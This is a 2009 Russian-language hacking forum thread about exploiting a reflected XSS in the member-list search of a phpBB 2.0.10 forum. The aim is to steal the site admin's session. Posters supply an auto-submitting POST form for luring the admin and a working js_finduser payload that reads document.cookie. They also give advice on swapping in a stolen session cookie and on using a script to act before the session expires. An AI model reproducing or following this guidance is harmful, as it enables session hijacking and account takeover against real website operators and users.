есть ли польза от этого XSS?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
есть ли польза от этого XSS? - 2009-08-22 16:26:42.273333
|
|
|
Lays_dag
Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
|
Привет. Нашел xss на одном из форумов phpbb 2.0.10, в /forum/memberlist.php в форме поиска не фильтруется вводимое, можно почти любой код внедрить в страницу. Но одна беда, как сделать правильную ссылку, чтоб ее можно было скормить админу, если сама ссылка не меняется при поиске? Заранее спасибо.
|
|
|
RE: есть ли польза от этого XSS? - 2009-08-22 17:25:21.503333
|
|
|
][aKER_теоретик
Сообщений: 1192
Оценки: 0
Присоединился: 2009-03-30 09:17:08.123333
|
На здоровье http://forum.xakep.ru/m_1298634/tm.htm
|
|
|
RE: есть ли польза от этого XSS? - 2009-08-23 09:28:49.713333
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
На эту версию форума есть более опасные баги чем xss
|
|
|
RE: есть ли польза от этого XSS? - 2009-08-23 09:48:40.100000
|
|
|
Lays_dag
Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
|
FriLL: quote:
На эту версию форума есть более опасные баги чем xss Все то, что мне удалось найти в интернете не помогл с этим форумом, сплойты для 2.0.10 не смогли справится с этим форумом, хотя вроде там и написано, что это этот форум и по описаниям тоже похож.(
|
|
|
RE: есть ли польза от этого XSS? - 2009-08-24 11:05:43.966666
|
|
|
Lays_dag
Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
|
][aKER_теоретик: quote:
На здоровье http://forum.xakep.ru/m_1298634/tm.htm Спасибо за ссылку. К сожелению ответ на свой вопрос я не нашел(, возможно что-то не понял.
|
|
|
RE: есть ли польза от этого XSS? - 2009-08-24 15:19:12.003333
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
ТС объясни нормально что из себя представляет xss качать phpbb нет желания
|
|
|
RE: есть ли польза от этого XSS? - 2009-08-25 15:52:30.993333
|
|
|
Lays_dag
Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
|
FriLL я хочу сказать, что сама ссылка после запроса не изменяется, хотя код выполняется, то есть там использован метод POST. Есть ли в этом случае возможность, что нибудь получить, например куки)?
|
|
|
RE: есть ли польза от этого XSS? - 2009-08-25 15:54:36.053333
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
есть надо форму с автосабмитом делать и потом на нее админа заманивать
|
|
|
RE: есть ли польза от этого XSS? - 2009-08-25 16:03:58.443333
|
|
|
Lays_dag
Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
|
то есть, ты имеешь ввиду написать скрипт, который при нажатии на него сам заполнит нужное поля, на нужной странице, нужным кодом?)
|
|
|
RE: есть ли польза от этого XSS? - 2009-08-25 22:15:45.010000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
<form name="xss" method="post" action="http://la-la-ppc.ru/">
<input type="hidden" name="id" value="тут твоё валу - берутся реальные названия полей из сорцов страницы">
<input type="hidden" name="mssg" value="тут тоже валу - берутся реальные названия полей из сорцов страницы">
</form>
<script language="JavaScript" type="text/javascript">
document.xss.submit();
</script>
|
|
|
RE: есть ли польза от этого XSS? - 2009-08-26 10:30:23.880000
|
|
|
Lays_dag
Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
|
Спасибо за ответы. Я немного не понял как пользоваться этой формой, вернее я использовал ее как понял, но ничего не вышло. Не понял к примеру по чему два инпута? Касательн проблемы, все оказалось немного легче, хотя передача данных осуществлялась методом POST, параметры не обрабатывались строго массивом HTTP_POST_VARS, что позволило сделать запрос через строку браузера, указав имя INPUT'а), которое в данном случае было "js_finduser", вот так получилось: forum/memberlist.php?js_finduser=%3Cimg%20src='ru.gif'%20%20width=100%20hight=100%20onError=alert(document.cookie)%3E
|
|
|
RE: есть ли польза от этого XSS? - 2009-08-26 15:04:09.036666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Два инпута там просто как пример. На самом деле должна быть форма-копия как на той странице, где нашел XSS, до <sсriрt language="JavaScript" type="text/jаvаsсript"> document.xss.submit(); </sсriрt> и уж в форму вставляй нужные тебе данные в то поле, где обнаружил XSS Скопировать форму (html-код формы) можно из сорцов страницы
|
|
|
RE: есть ли польза от этого XSS? - 2009-08-26 17:46:15.026666
|
|
|
Lays_dag
Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
|
Спасибо Pashkela. В общем куки доходят нормально, поменял я их в опере, но толку ноль, может что то не верно делаю? Вот к примеру phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A6%3A%22105275%22%3B%7D;%20phpbb2mysql_sid=b25854bf82cf37d6a06020a678b4d56a , выделенную часть я поменял на свои, обновил страницу, а толку ноль. Как думаешь в чем может быть дело?
|
|
|
RE: есть ли польза от этого XSS? - 2009-08-26 17:53:25.256666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
в том например, что надо все куки менять, а не только phpbb2mysql_data, тем паче только "выделенные части" - вообще все
|
|
|
RE: есть ли польза от этого XSS? - 2009-08-26 18:08:25.386666
|
|
|
Lays_dag
Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
|
я и сид тоже поменял, просто выкидывает со своего аккаунта и все.
|
|
|
RE: есть ли польза от этого XSS? - 2009-08-26 19:32:25.610000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Есть вероятность, что сессия уже истекла (зависит от того, когда куки спёр) или пароль изменили, или просто выйти и зайти на форум обратно. Как словил куки - действовать надо мгновенно, т.е. автоматически (скриптом)
|
|
|
RE: есть ли польза от этого XSS? - 2009-08-27 10:44:36.450000
|
|
|
Lays_dag
Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
|
Какой скрипт юзать посоветуешь? Желательно легкий в обращении)
|
|
|
RE: есть ли польза от этого XSS? - 2009-08-27 10:47:12.513333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Самописный. Нет таких готовых-универсальных, насколько я знаю
|
|
|
|
|